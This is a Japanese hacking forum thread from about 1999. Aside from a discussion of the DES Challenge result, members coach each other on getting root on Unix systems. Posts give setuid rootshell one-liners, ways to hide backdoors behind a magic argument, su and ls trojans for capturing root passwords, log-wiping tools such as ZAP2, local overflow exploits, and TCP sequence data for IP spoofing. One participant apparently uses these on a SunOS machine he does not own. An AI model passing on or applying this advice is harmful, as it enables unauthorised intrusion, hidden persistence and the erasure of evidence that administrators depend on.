| 【メッセージ】 >このままの調子だと、いわゆる「解読速度二倍/年」という法則は >成り立たないのかも知れません。 へえ〜。私は最近暗号に目覚めたのでそんな法則があると知りませんでしたが、 ほんと成り立っていませんね。 暗号解読コンテスト(DES Challenge) 98/1・・・39日 98/7・・・2日と8時間 99/1・・・22時間15分 まあ、これが全鍵中の何%で的中なのかはわかりませんが、驚異的な短縮です。 >UNIXのPasswordセキュリティの分野では90Bitとか使わないのでしょうか? 簡単にいえば歴史が浅いこと、DESとの互換性の確保、 従来のDESへの投資が無駄になるなどあるからですかね。 ほかにも慣れやユーザへの負担、特許の問題などあるかも知れませんが、 詳しくは私もわかりません。 ちなみに、DES Challengeはイベント的な要素が強く、 今や56ビットのDESでは十分な安全性は得られないと警鐘を鳴らすことが、主目的だそうです。 これによって管理者が危機意識を持てば、 ほかのアルゴリズムに移っていく可能性はあるかも知れませんね。 |
| 【名 前】チョムスキー 【タイトル】暗号 01/25 15:40 |
Chomsky@excite.co.jp |
| 【メッセージ】 チョムスキーと申します。あいにくこの掲示板のメインテーマにそえるような知識はさほど持ち合わせていませんが、大好きな暗号の話題がありましたのでほんの少し首を突っ込ませていただきます。なにとぞよろしくお願いします。 >Hariru 様 22時間ですか..!私の記憶では、最初の56bitDESの解読(1997)では、7万8000台を動員して約5ヶ月でした。しかも全鍵(約7京2千兆個)のうちの24.6%で的中ですから、5ヶ月でもある意味幸運だったといえます。それが二年と経たないうちにここまでになるとは..技術革新の速さを痛感させられます。このままの調子だと、いわゆる「解読速度二倍/年」という法則は成り立たないのかも知れません。 >うにゅん 様 恐らくそんな感じだったんだろうと思います。上の解読プロジェクトでも、Pentium90MHzマシンにBreeBSDをのっけたのを中心に行われたそうです。それにしてもロマンあるやり方ですね..。 * * * ところで私のような「UNIXのことあまり知らない暗号好き」が56Bit共通鍵暗号と聞くと、何故?ということになります。UNIXのPasswordセキュリティの分野では90Bitとか使わないのでしょうか?これなら今回のプロジェクトがアタックしても(仮にシステムがずっとこのままなら)最低20年はかかるはずなのにです。あとMD5ダイジェストとDES共通鍵を使っていることは良く聞きますが、他のアルゴリズム、例えばBlowfish共通鍵とか、IDEA共通鍵とかは使われていないのでしょうか..? やや逸脱した話題ですが箸休め程度にかまっていただけるとうれしいです。 |
| 【名 前】うにゅん 【タイトル】re:(1)hrs.c 01/25 03:41 |
unewn4th@usa.net |
| 【メッセージ】 >の"hoge"はMAGICの間違いじゃないでしょうか。 あ、そうですね。これだとhogeじゃないと通らないです。 if (argc==2 && strcmp(argv[1],MAGIC)==0){ ですね。 >とかありますが気休め程度かも。 前にも書きましたけど、まともな検査をするとバレます。 検査する方法はいくらでもありますし。 たとえば、OSをinstall直後にsuidをすべてtarで-cvfして、cron みたいなので定期的に-xvfしてdiffしたあと-xvfされたファイル を削除するってのも早期発見にはいいでしょうしね。 でも、hrs.c+コザイクみたいな方法でrootshell作ると、まともな 検査をしないと発見するのは難しいですよ。 IPAやJPCERTが、通報時に管理者に通達する一般的なシステム検査の方法 もそれなりの検査なんて触れてませんしね。 |
| 【名 前】ith 【タイトル】hrs.c 01/25 02:27 |
ith@mail.tfz.net |
| 【メッセージ】 hrs.cの26行目 > if (argc==2 && strcmp(argv[1],"hoge")==0){ の"hoge"はMAGICの間違いじゃないでしょうか。 あと、hrs.c使う上での小細工として 1.chgrp、chownもしてやる 2.オリジナルの方はサイズ等を変える 3.hrsのファイルのCRC等をオリジナルと一緒にする とかありますが気休め程度かも。 |
| 【名 前】うにゅん 【タイトル】re:(1)ログ消し 01/23 20:25 |
unewn4th@usa.net |
| 【メッセージ】 >ZAP2というのは指定したIDのラストログインを消すんですよね。 wtmp系、utmp系も消します。 コマンド履歴等のログはOSや環境によって違いますし、マニュアルで消すのが いいと思います。といっても、アレな鯖の裏ログなんて、全部は気付かない 場合がほとんどで、なかなか消せたもんじゃないですけどね。 プリンタ打出しとかだと、かなりアウトです。 詳しくは、PenguinDocumentの「ログの解体とログの消去」と 「IRIX防御マニュアル」にイロイロ書いてます。 >これ以外にもいいログ消しツールってあるんでしょうか。 solarisなら、ウチのPenguinToolboxにあるulwはどうですか? |
| 【名 前】うにゅん 【タイトル】re:(1)DESの話題 01/23 20:13 |
unewn4th@usa.net |
| 【メッセージ】 >インターネット接続されたおよそ10万台のPCは、 >1秒あたり2450億回の速さを駆使してDESで暗号化された わお。 こんな感じですかねー。 (1)クラッキングサーバなるものを用意し、そのサーバに解読したい 暗号文を設定する。 (2)クラッキングクライアントを複数用意し、サーバに接続。 (3)サーバはクライアントの接続を監視し、接続があったクライアント に接続クライアント数に応じてクラックタスクを分配する (4)クラックプロセスをサーバに送り、1つのクライアントがクラック できれば終了。 このプログラムを組んでCGIとして動作させ、CGIが使える 鯖を集めれば結構イケるかもしれませんね。 |
| 【名 前】うにゅん 【タイトル】re:(1)そんな〜(;_; 01/23 20:02 |
unewn4th@usa.net |
| 【メッセージ】 >cp /bin/sh /etc/hoge >chmod 4755 /etc/hoge ええと、これはshでsetuid(getuid()); とかやってるんでしょう(suid対策)。 uidとgidを0にして/bin/shを呼べばOKです。 |
| 【名 前】HAE 【タイトル】ログ消し 01/23 17:39 |
puyoo@geocities.co.jp |
| 【メッセージ】 ログ消しの方法ですがZAP2というのは指定したIDのラストログインを消すんですよね。 これ以外にもいいログ消しツールってあるんでしょうか。 できればログイン時に実行してログアウトしたときにログイン記録とコマンド履歴も 消してくれるような物があればいいんですが、やっぱここまで都合がいいのはないんでしょうか? plamoの方は以外とバグが多くてやりやすいです。でもTurboは結構頑丈でした。(^^; |
| 【名 前】Rorrim 【タイトル】re:(1)DESの話題 01/23 13:30 |
|
| 【メッセージ】 えっ?22時間? すごい速さですね〜(驚) やっぱ、並列処理の時代なんでしょうか。 Johnも1.7あたりで並列を取り入れるかもと言う噂ですから... (単純に他に取り入れるべき要素が無くなってきたとも考えるが) しかし10万台もどうやって集めたんだろう |
| 【名 前】Hariru 【タイトル】DESの話題 01/23 06:44 |
hariru@ami.602.cc |
| 【メッセージ】 1月18日午前9時より問題が公開された56ビットDESを用いた暗号解読コンテスト、 DES Challenge IIIですが、最短時間で解読に成功してたらしいですね。 その時間もなんと驚きの、22時間15分!! 解読に成功したのはDistributed.NetとEFF(Electronic Frontier Foudation)。 EFFの暗号解読専用スーパーコンピュータ「Deep Crack」とインターネット接続された およそ10万台のPCは、1秒あたり2450億回の速さを駆使してDESで暗号化された 平文の秘密鍵を探し当てたようです。 今や56ビットのDESでは、十分な安全性は得られないということなのでしょう。 個人でどうこうできるレベルではありませんが、恐ろしい話ですね。 http://www.rsa.con/pressbox http://www.eff.org/pub/Privacy/Crypto_misc/DESCracker/HTML/19990119_deschallenge3.html |
| 【名 前】HAE 【タイトル】そんな〜(;_; 01/21 16:06 |
puyoo@geocities.co.jp |
| 【メッセージ】 > ただいま確認中・・・ > Turboただいま死んでいます。 > もしかしたら間違ったソースコードをコンパイルしていたかもしれません。(^^; やっと設定ができてうまくいきました。 ところが一般ユーザーからrootになるプログラムはコンパイルして実行は できるんですが、実は両方のLinuxともにroot権限を持ってませんでした。 Plamoで依然はプロンプトが#だったので勘違いだったみたいです。(最悪;_;) コンパイルするとパスワードを聞いてくるのはまだ解明してません。どうしてだろ(^^; あとは rootで cp /bin/sh /etc/hoge chmod 4755 /etc/hoge 一般ユーザーで /etc/hoge の簡易rootはplamoはroot権限を得られるのに(確認済み)turboはrootになれません。 |
| 【名 前】うにゅん 【タイトル】re:(1)NewDocument読みました。 01/21 09:18 |
unewn4th@usa.net |
| 【メッセージ】 >Rorrimさん こないだのチャットは、あんまり参加できなくて残念でした... そろそろ、卒論ですねぇ。がんばってください。 >VoiceModemを使ってる私としては、 >「イタデン」が一番恐い(謎) うは〜(笑) |
| 【名 前】うにゅん 【タイトル】再アップ 01/21 07:30 |
unewn4th@usa.net |
| 【メッセージ】 PenguinToolboxをよく見ると、ずっと前にアップした telnet loggerが消えてました。ってことで、アップしました。 |
| 【名 前】HAE 【タイトル】re:(2)rootをとりました。 01/20 19:00 |
puyoo@geocities.co.jp |
| 【メッセージ】 > >これをplamoなら>何も言わずrootになるのがturboだとpasswardを聞いてきます。(^^; > どのプログラムですか? ただいま確認中・・・ Turboただいま死んでいます。 もしかしたら間違ったソースコードをコンパイルしていたかもしれません。(^^; Turoとplamoの両方が新しいLAN-CARDほ認識させめため再インストール(再建築^^;) どうもturboはwindowsからPINGが通るのにTELNET,FTPができないので調整中です。 plamoはftp,telnetもできるようになりました。(今までローカルからやってたんです) > > >あとは自分のTurboLinuxでも挑戦します。 > >自分のなら遠慮せずに壊れても大丈夫なので(^^; > それが一番です。がんばってください。 結構ハックの勉強のため自分のLinuxは何度も生まれ変わりました(^^; > > rootがカレントディレクトリにパスを通している場合は、 > とれる可能性があります。 > Document書いたんで、参考にしてください。 > http://www.fortunecity.com/skyscraper/byte/551/docs/lst.txt 読みました。ありがとうございます。 って、すごくこわいです。 こんなんでrootが簡単にとれちゃうなんてすごいです。(^^; こうなるともう誰のでもいいからアカウントがあってFTPとか制限なければ ほぼ完璧にrootになれますね。(^o^; |
| 【名 前】Rorrim 【タイトル】NewDocument読みました。 01/20 04:28 |
49-hack@ijk.com |
| 【メッセージ】 WinHackのDocument読みました。 恐い世の中に成りそうな気配が...(^^; VoiceModemを使ってる私としては、 「イタデン」が一番恐い(謎) |
| 【名 前】うにゅん 【タイトル】re:(1)rootをとりました。 01/19 19:13 |
unewn4th@usa.net |
| 【メッセージ】 >これをplamoなら>何も言わずrootになるのがturboだとpasswardを聞いてきます。(^^; どのプログラムですか? >あとは自分のTurboLinuxでも挑戦します。 >自分のなら遠慮せずに壊れても大丈夫なので(^^; それが一番です。がんばってください。 >lsトロイってlsを実行するとrootがとれるんですか? rootがカレントディレクトリにパスを通している場合は、 とれる可能性があります。 Document書いたんで、参考にしてください。 http://www.fortunecity.com/skyscraper/byte/551/docs/lst.txt |
| 【名 前】HAE 【タイトル】rootをとりました。 01/19 17:07 |
puyoo@geocities.co.jp |
| 【メッセージ】 > これって、loginのoverflowを使ったやつじゃないですか? > うまくいかなかったら、パッチがあたってるってことです。 > - スタックオーバーフローの危険性 - > > Written by うにゅん > Oct.23, 1998 にあったやつをコンパイルしたんです。 これをplamoなら何も言わずrootになるのがturboだとpasswardを聞いてきます。(^^; > それだと、rootとってないとダメじゃないですか(笑) > 普通、suトロイは管理者クラスのアカウントをgetした後、 > それに仕込むんです。rootはコンソールからログインする場合も > ありますけど、管理者もいつもrootで作業してるわけじゃないです > ので、一般ユーザレベルのアカウントで作業して、必要な場合に > suでrootになるわけで、この作業でrootパスをロギングするんです。 なんとかrootになれました。(SUN5.5) でもすぐにexitしちゃいましたけど。 あとはこのソースプログラムを改造して特定のオプションを入力したときのみ rootになれるようにして自分のホームディレクトリにおいておきます。 ふつうに実行したら"hello C World"でも表示するようにしておきます。(^o^ あとは自分のTurboLinuxでも挑戦します。 自分のなら遠慮せずに壊れても大丈夫なので(^^; > > あ、あとこのpath、.(カレントディレクトリ)にパスが通ってますね。 > 使われ方によりますが、lsトロイとかでもrootになれるかもしれませんね。 lsトロイってlsを実行するとrootがとれるんですか? それだったらすごく怖いです(^^; |
| 【名 前】うにゅん 【タイトル】更新 01/19 01:57 |
unewn4th@usa.net |
| 【メッセージ】 トロイを使ったWinHackに関するDocumentを書いてみました。 関連ツール類がまだですが、そのうち作ります。 |
| 【名 前】うにゅん 【タイトル】re:(6)ちょっと 01/18 18:28 |
unewn4th@usa.net |
| 【メッセージ】 >ただrootになるプログラムを実行するとパスワード >を聞いてきます。(;_; これって、loginのoverflowを使ったやつじゃないですか? うまくいかなかったら、パッチがあたってるってことです。 >rootのパッチはこんな感じになってました。 >この場合って/usr2/gnu/binにいれればいいんですか? それだと、rootとってないとダメじゃないですか(笑) 普通、suトロイは管理者クラスのアカウントをgetした後、 それに仕込むんです。rootはコンソールからログインする場合も ありますけど、管理者もいつもrootで作業してるわけじゃないです ので、一般ユーザレベルのアカウントで作業して、必要な場合に suでrootになるわけで、この作業でrootパスをロギングするんです。 あ、あとこのpath、.(カレントディレクトリ)にパスが通ってますね。 使われ方によりますが、lsトロイとかでもrootになれるかもしれませんね。 |
| 【名 前】HAE 【タイトル】re:(5)ちょっと 01/18 17:37 |
puyoo@geocities.co.jp |
| 【メッセージ】 > xついてたら、普通は実行できますが... > 絶対パスとかイロイロやってください。 絶対パス指定で実行できました(^o^ ただrootになるプログラムを実行するとパスワードを聞いてきます。(;_; > あのStackOverflowのテキストはLinux用です。 > ですから、Sol25とかではダメです。 > ただ、応用はできますので、同様の方法でおっかけていって > rootになってみるとoverflow-exploitの原理が良く分かって > いいかもしれませんね。 うーん、ちょっとそういう実力はないです。(;_; SUNにはSUトロイでも仕掛けようと思ってます。 でもrootの.cshrcって一般ユーザーで書き換えできないから困ってます。 コンパイルは一応できて実行も成功しました。(自分のIDだけですけど^^;) rootのパッチはこんな感じになってました。 この場合って/usr2/gnu/binにいれればいいんですか? set path = ( \ /usr2/gnu/bin \ /usr2/X11R6/bin \ . \ /bin \ /usr/bin \ /usr/local/bin \ /usr/local/cap \ /usr/ccs/bin \ /usr/demo/SOUND/bin \ /usr/lib/lp/bin \ /opt/SUNWwabi/bin \ /usr/sadm/bin \ /usr/sadm/install/bin \ /usr/sadm/sysadm/bin \ /usr/SUNWale/bin \ /usr/proc/bin \ /usr/sbin \ /usr/dt/bin \ /usr/snadm/bin \ /usr/oasys/bin \ /usr/vmsys/bin \ /usr/xpg4/bin \ /var/spool/lp/bin \ /opt/SUNWrtvc/bin \ /opt/SUNWdxlib/bin \ /opt/SUNWdxlib/demo/bin \ /opt/SUNWste/bin \ /opt/SUNWspro/bin \ /opt/SUNWspro/swmgr/bin \ /opt/SUNWspro/FileMerge/bin\ /opt/SUNWspro/SW3.1/bin \ /opt/SUNWspro/SC4.0/bin \ /opt/SUNWspro/SPROutool/bin\ /bin \ /usr/openwin/bin \ /etc/opt/SUNWleo/bin \ |
| 【名 前】うにゅん 【タイトル】re:(4)ちょっと 01/17 14:47 |
unewn4th@usa.net |
| 【メッセージ】 >自分のホームディレクトリで実行もできないんです。 >path ってどうやって通すのですか? xついてたら、普通は実行できますが... 絶対パスとかイロイロやってください。 Linuxは.bashrcでパス指定すると実行時にパスが通ります。 >SUN OSは一般ユーザーからrootになることができません。 あのStackOverflowのテキストはLinux用です。 ですから、Sol25とかではダメです。 ただ、応用はできますので、同様の方法でおっかけていって rootになってみるとoverflow-exploitの原理が良く分かって いいかもしれませんね。 |
| 【名 前】HAE 【タイトル】re:(3)ちょっと 01/17 11:38 |
puyoo@geocities.co.jp |
| 【メッセージ】 > ./にpathが通ってないのに > $a.out > とかで実行してないですか? > あ、でもだからといって./にpathを通すのはキケンですので > 家pc以外ではやめましょうね。 自分のホームディレクトリで実行もできないんです。 path ってどうやって通すのですか? dosならやり方知ってますが、unix系はまだあんまりわからないです。(^^; > shellがいつのまにか(笑)suid(-r-sr-xr-xなど)になってませんか? これはなってないみたいです。 でもやっぱり本物のrootで入るとログイン時にメッセージがいろいろ英語 ででてきたので気持ち悪いから再インストールしちゃいました(^^; SUN OSは一般ユーザーからrootになることができません。 Permission denied. で1つも成功しませんでした。(^^; それにしてもSUN OS5.5って・・・なんでこんなに情報が少ないんだろう(^^; |
| 【名 前】sp00ky 【タイトル】感謝 01/16 23:39 |
|
| 【メッセージ】 ありがとうございました よくよくやってみると単なる勘違いで うごいていませんですた つまらない質問ですいませんでしたー これからもよろしくー |
| 【名 前】うにゅん 【タイトル】re:(1)たびたびすいません 01/16 15:27 |
|
| 【メッセージ】 >c:\extusr aaa.html herf=+http://www.target.or.jp/~>aa.txt >これはtxtがでてもなにもはいってません←おしえていただいたもの とりあえず、とあるISPの会員ページで確認しましたが、正常動作 しますけど。 hrefのところ、htmlのソース確認しましたか? <a href="~hoge/">hogeのホームページ</a> とかの場合は、 extusr aa.html href=+~ にしないといけませんよ。 >c:\extusr aaa.html a herf=+http://www.target.or.jp/~>aa.txt これは、だめですね。テキスト修正しないと... 第2引数がaになってしまいます。 extusr aaa.htm href=+http://www.target.or.jp/~ > aa.txt にしてください。 >しかも元のファイル名は「exu100.exe」なので >「extusr.exe」になおしてよいのですか? はい。 |
| 【名 前】sp00ky 【タイトル】たびたびすいません 01/15 23:32 |
|
| 【メッセージ】 レス有り難うございます うにゃんさん。 でもなんかうまくいきません c:\extusr aaa.html herf=+http://www.target.or.jp/~>aa.txt これはtxtがでてもなにもはいってません←おしえていただいたもの c:\extusr aaa.html a herf=+http://www.target.or.jp/~>aa.txt これは「ファイルがみつかりません」←これがヘルプにかかれてたもの となります。 しかも元のファイル名は「exu100.exe」なので 「extusr.exe」になおしてよいのですか? |
| 【名 前】うにゅん 【タイトル】re:(2)ちょっと 01/15 11:45 |
unewn4th@usa.net |
| 【メッセージ】 >bash : command not found ./にpathが通ってないのに $a.out とかで実行してないですか? あ、でもだからといって./にpathを通すのはキケンですので 家pc以外ではやめましょうね。 >Plamoの方はいつのまにかなぜかみんなroot権限を持つようになってしまいました。 shellがいつのまにか(笑)suid(-r-sr-xr-xなど)になってませんか? |
| 【名 前】HAE 【タイトル】re:(1)ちょっと 01/15 11:07 |
puyoo@geocities.co.jp |
| 【メッセージ】 > main( int argc, char *argv[] ) なんとかコンパイルできました。 ちゃんと実行できました。 それと・・・ > The Shadow Penguin Documents. No. 8 > > - スタックオーバーフローの危険性 - > > Written by うにゅん にあるやつをいろいろコンパイルしたところ・・・ PLAMO Linuxではちゃんとrootになることができました。 TurboLinuxではコンパイルはできるのになぜか実行できません。 非常に不思議です。 bash : command not found でそんなもんねーよ。 っておこられます。ちゃんとx属性はついてます。不思議(^^; Plamoの方はいつのまにかなぜかみんなroot権限を持つようになってしまいました。 何度ログインしてもみんなログイン時からrootです。 一般ユーザーを追加しても最初からrootです。 passwdをのぞくとちゃんと0:0以外の一般ユーザーになってます。 本物のrootで入るとログイン時に変な文がでてきます。(^^; ただいまSUN OS5.5でこれらのプログラムを実験中・・・(^^; |
| 【名 前】peku 【タイトル】リンク貼りますので・・・ 01/15 09:53 |
peku@aa.mbn.or.jphttp://i.am/zatugaku/ |
| 【メッセージ】 はじめまして、 「雑学の館」管理人の”peku”です。 「UG Links」にリンク張りますので・・・・ もしも不都合があれば、連絡してください。 すぐに変更しますので。 今後ともよろしくお願いします。 |
| 【名 前】うにゅん 【タイトル】re:(1)ちょっと 01/13 07:50 |
|
| 【メッセージ】 >うにゅんさんが指摘されないので少し不思議に思っていたのですが、 あっ(笑) 急ぎレスで、よく見てませんでした(イイワケ... うひーはずかしー。 |
| 【名 前】Hariru 【タイトル】ちょっと 01/13 07:39 |
hariru@ami.602.cc |
| 【メッセージ】 エラーの中の >:55:passing arg 2 of 'connect' from incompatible pointer type と >AAA.c:55: warning: passing arg 2 of `connect' from incompatible pointer type は、おそらく main( int argc, char *argv[] ) のように*を入れていないからではないでしょうか? うにゅんさんが指摘されないので少し不思議に思っていたのですが、 OSによっては*がなくてもまともに走るのかな? いや、ちょっと気になったもので・・・ |
| 【名 前】うにゅん 【タイトル】まるちれす 01/13 02:20 |
|
| 【メッセージ】 HAEさん>エラーが出ます。 両Linuxのエラーはwarningですね。実行ファイルはできてますよね? たぶん問題ないです。 warningが気になる場合はmanで調べて型を合わしましょう。 SUNは、System/V系なので、ip.hは削除しましょう。 sp00kyさん>DOS窓では >extusr aaa.html a herf=+http://www.target.or.jp/~ extusr.exeがあるディレクトリに移るか、パスをとおしてください。 (例) えくすぷろーらとかでc:\にextusr.exeとaaa.htmlをコピーする。 で、DOS窓を開いて cd \(りたーん) extusr aaa.html herf=+http://www.target.or.jp/~ > a.txt(りたーん) で、リストファイルa.txtがc:\にできます。 |
| 【名 前】sp00ky 【タイトル】extusr 01/13 02:06 |
|
| 【メッセージ】 はじめまして sp00kyです extusrのことについてですが extusrを起動させたくても コマンドまたはファイル名が違うってでてしまいます DLしたHP一覧を「aaa.html」だとしたら DOS窓では extusr aaa.html a herf=+http://www.target.or.jp/~ と打つのでしょうか 最初から教えてくんですいません |
| 【名 前】gotchb 【タイトル】はじめまして 01/12 16:41 |
|
| 【メッセージ】 PenguinDocuments いただきました。 どうもありがとうございます。 |
| 【名 前】HAE 【タイトル】エラーエラーエラー^^; 01/12 12:49 |
puyoo@geocities.co.jp |
| 【メッセージ】 > > という有名?なソフトを自分のLinuxで試してみたところ。 > 一般ユーザーからrootに変身しました。ありがとうございます。 SlackwareならできたのにTurboLinux3.0β5の方ではできませんでした。 TurboLinuxも中身はSlackwareだと聞きましたが・・・ カーネル違うのかな。(^^; > 偽httpdログを追加するツール作成(とりあえず) のプログラムをコンパイルしてみました。 TurboLinuxだと :In Function 'main' :48:Warning :passing arg 1 of 'inet_addr' makes pointer from integer without a cast :49:Warning :passing arg 1 of 'inet_addr' makes pointer from integer without a cast と出てしまいます。 Plamo Linux(中身はSlackware)だと このエラーにさらに :55:passing arg 2 of 'connect' from incompatible pointer type というエラーが出ます。 SUNだと /usr/include/netinet/ip.h:125: parse error before `n_long' /usr/include/netinet/ip.h:125: warning: no semicolon at end of struct or union /usr/include/netinet/ip.h:125: warning: no semicolon at end of struct or union /usr/include/netinet/ip.h:128: parse error before `n_long' /usr/include/netinet/ip.h:128: warning: no semicolon at end of struct or union /usr/include/netinet/ip.h:129: warning: data definition has no type or storage c lass /usr/include/netinet/ip.h:130: parse error before `}' /usr/include/netinet/ip.h:130: warning: data definition has no type or storage c lass /usr/include/netinet/ip.h:131: parse error before `}' test.c: In function `main': test.c:48: warning: passing arg 1 of `inet_addr' makes pointer from integer witho ut a cast test.c:49: warning: passing arg 1 of `inet_addr' makes pointer from integer witho ut a cast AAA.c:55: warning: passing arg 2 of `connect' from incompatible pointer type こんなに出てきました(^^; |
| 【名 前】HAE 【タイトル】re:(4)教えて〜 01/11 21:54 |
|
| 【メッセージ】 すみません。 phf.cは対象(Linux,SUN os)を間違えていたからみたいです。 nlspath-overflow-exploit という有名?なソフトを自分のLinuxで試してみたところ。 一般ユーザーからrootに変身しました。ありがとうございます。 自分でコンパイルしてrootになれたのは初めてです。(^^; どうも一般的にはスニファーとかトロイとかすでにrootであることを前提とした プログラムしか見つからなかったので困っていました。 でもnlspath-overflow-exploitってSUN System V (SunOS 5.5) でコンパイルしたら usr/ccs/bin/as: "/var/tmp/cca003HA.s", line 23: error: unknown "%"-symbol /usr/ccs/bin/as: "/var/tmp/cca003HA.s", line 23: error: unknown "%"-symbol /usr/ccs/bin/as: "/var/tmp/cca003HA.s", line 23: error: statement syntax で無理でした。対象がLinuxソースだったので当然ですが・・・ 一応FTPでコンパイル済み転送して実行したら % f f: Permission denied. になりました。 なんでエラーメッセージが出たか不思議です。 (SUN と LINUXなのになんで正常に実行されたんだろう) でも本当はSUNの方のRoot化プログラムが欲しいです(^^; 長文すみません。 |
| 【名 前】うにゅん 【タイトル】re:(1)だ〜 01/11 16:14 |
unewn4th@usa.net |
| 【メッセージ】 おやnightさん、おひさ。 >まー1〜2月は暇だし気長にやるかな 寒い季節は○っ○○は少ないんでしょうか... でも、3月は忙しそう。今のうちですねぇ〜 |
| 【名 前】うにゅん 【タイトル】ちょっと 01/11 16:07 |
unewn4th@usa.net |
| 【メッセージ】 体調悪い上に、仕事が山のようにたまってますので しばらく消えます。メールはできるだけチェックしますので、 何かあったら連絡ください。 >int ZEROさん >suidなgameかなにかと一緒に紛れ込ませておく、というのはどうでしょう? こういうrootshellは、以前にウチのDocument、Toolboxで紹介しま した。まともな検査をしないと、見つけられないでしょう。 >これで一般ユーザが uid=0になったものと、uid=(そのまま)でeuid=0になったものとで >どのような違いがあるのでしょうか? ruid、euidの違いについては、manやそこらの本を参照してください。 seteuid(0)してshを呼んだ場合、権限的にはほぼrootですが、 例えばruidをチェックしてるプログラム等(su等)は引っ掛かります。 setuid等はeuid、ruidの両方をセットするので通常、rootshell はsetuidを使います。 |
| 【名 前】int ZER0 【タイトル】re:(4)教えて〜 01/11 02:18 |
intzer0@usa.net |
| 【メッセージ】 >main(){seguid(0);setgid(0);system("/bin/sh");} 面白いですね、ウチでさっそく試してみました。 そのまま貼りつけてやったらエラー。 seguid -> setuid ですね(笑) これ、特定の引数を与えないとエラーを出させるようにして suidなgameかなにかと一緒に紛れ込ませておく、というのはどうでしょう? 自分以外の人が実行してもr00tになってしまうこともないですし ...ってこの程度のことは普通なのかしら? それと、これで遊んでみて疑問に思ったのですが、 これで一般ユーザが uid=0になったものと、uid=(そのまま)でeuid=0になったものとで どのような違いがあるのでしょうか? 素朴な疑問でした。 |
| 【名 前】night 【タイトル】だ〜 01/11 00:32 |
http://server5.hypermart.net/night777/mein.htm |
| 【メッセージ】 おひさです おすすめに逆らってソフトバンクのwinsock2.0プログラミング など買ってしまいましたが、 サンプルソースが少なすぎて理解しがたいものが.... まー1〜2月は暇だし気長にやるかな |
| 【名 前】うにゅん 【タイトル】re:(3)各OS 01/10 18:43 |
unewn4th@usa.net |
| 【メッセージ】 >win 95/98は一体、やる気あるんでしょうか? M$は、あまりやる気はないようですね。最近もまたスゴいの が出たようですし。 まぁ、winがヘボなんはしょうがないとしても、SGIもねぇ... でもIRIXは消えないらしいですね。 >solaris 5.xはなんですか? やっぱ、それなりのネーミングはあるんでしょうかねぇ。 |
| 【名 前】うにゅん 【タイトル】re:(3)各OS 01/10 18:24 |
unewn4th@usa.net |
| 【メッセージ】 イカンです。 インフルエンザでしんどいです。 >Irixの古いばーじょんは64K。 >最近のは一定で変わらない(ポートごとに違う値だけど)。 うは〜、あまりしゃべらないで〜(笑&謎) >これ、アレの手口です。>うにゅんさん。 △△△に関してはすでにナニしてるんですけど、 他の○○たちは相変わらずでーす。 あ、でも、ダメですよ(笑) アレ、実は他にもまだ2つほどあったんですよ(爆) |
| 【名 前】うにゅん 【タイトル】re:(3)教えて〜 01/10 17:26 |
unewn4th@usa.net |
| 【メッセージ】 >phf.c:In function 'main' ここが肝心なんですよ。 エラーメッセージ、ちゃんと書いてください。 >なぜか実行できなかったりx属性はもちろんついてます。 >なにもおきなかったりします。 穴がふさがってると、当然rootになれないですよ。 >なんか優秀なソースプログラムありませんか? 優秀とか優秀でないとかはないです。 バージョン、パッチなどをちゃんと確認しましょう。 >for Sun OS 5.5 お分かりだと思いますが、overflow-exploitなどはCPU依存です。 for sparcをintel版で動かしてもダメですよ。 >でまがい物程度は作れますがこれじゃ〜(^^; まがいものじゃないです。れっきとしたrootshellです。 たしかに、uid!=0から認証なしにuid=0で動くshellがrootshell という考えだとoverflow-exploitもrootshellと言えなくもない ですけどね。 main(){seguid(0);setgid(0);system("/bin/sh");}でも、ばれにくくする方法はいくらでもありますよ。 |
| 【名 前】貝 【タイトル】re:(2)各OS 01/09 15:31 |
|
| 【メッセージ】 >win 95/98は一体、やる気あるんでしょうか? >で、sun osの古いやつが64Kルールだって事は分かるんですが、 >solaris 5.xはなんですか? >ipspoofingのテキストに追加したいので何か知ってたら是非お願いします。 Irixの古いばーじょんは64K。 最近のは一定で変わらない(ポートごとに違う値だけど)。 問題ありありですね。 これ、アレの手口です。>うにゅんさん。 |
| 【名 前】 【タイトル】re:(2)教えて〜 01/09 10:35 |
|
| 【メッセージ】 エラーですか。 ふつうのコンパイラのエラーメッセージなんですけど。 たとえば phf.c:In function 'main' phf.c:79:warning ・・・・・ というかんじです。 なかにはヘッダファイルが見つからない。 ってのあります。これはまあしょうがないとしても・・・ コンパイルできるのもたまーにありますけど(^^; なぜか実行できなかったりx属性はもちろんついてます。 なにもおきなかったりします。 これらは自分のLinuxで一応、本物のrootでコンパイルかけてます。 ソース対象もLinuxになってます。 どうしてだか自分にも不思議です。 なんかとにかく一般ユーザーからrootになってみたいです。 なんか優秀なソースプログラムありませんか? for Linux(とりあえずカーネルは特に気にしません^^;) for Sun OS 5.5 rootで cp /bin/sh /tmp/aaa chmod 4755 /tmp/aaa でまがい物程度は作れますがこれじゃ〜(^^; 自分がすでにrootであることが前提だし、すくばれちゃうし。 |
| 【名 前】reverse 【タイトル】re:(1)各OS 01/08 20:43 |
esrever@usa.nethttp://members.tripod.com/~reverse/ |
| 【メッセージ】 win 95/98は一体、やる気あるんでしょうか? で、sun osの古いやつが64Kルールだって事は分かるんですが、 solaris 5.xはなんですか? ipspoofingのテキストに追加したいので何か知ってたら是非お願いします。 |
| 【名 前】root. 【タイトル】各OS 01/08 19:04 |
root.@iname.com |
| 【メッセージ】 実験してみました。 Windows95/98(弱点ありあり) 02412920(0024d178) . 00000001 02412921(0024d179) . 00000001 02412922(0024d17a) . 00000001 02412923(0024d17b) . 00000001 02412924(0024d17c) . 00000001 02412925(0024d17d) . 00000001 02412926(0024d17e) . 00000001 ・FreeBSD(無し) 540278900(20340074) . 00035245 540329723(2034c6fb) . 00050823 540511158(20378bb6) . 00181435 540553291(2038304b) . 00042133 540605237(2038fb35) . 00051946 540661960(2039d8c8) . 00056723 540713981(203aa3fd) . 00052021 ・SunOS 4.1.4(問題ありあり) 50944000(03095800) . 00064000 51008000(030a5200) . 00064000 51072000(030b4c00) . 00064000 51136000(030c4600) . 00064000 51264000(030e3a00) . 00128000 51328000(030f3400) . 00064000 51392000(03102e00) . 00064000 51456000(03112800) . 00064000 ・Solaris 5.x(多分問題ありあり) 2282873724(8811e37c) . 00060532 2282930851(8812c2a3) . 00057127 2282930852(8812c2a4) . 00000001 2283346971(88191c1b) . 00416119 2283445799(881a9e27) . 00098828 ふふふ anonymous mailer開発中。 手広く展開(やりすぎ では。 |
| 【名 前】うにゅん 【タイトル】re:(1)ども 01/08 18:08 |
unewn4th@usa.net |
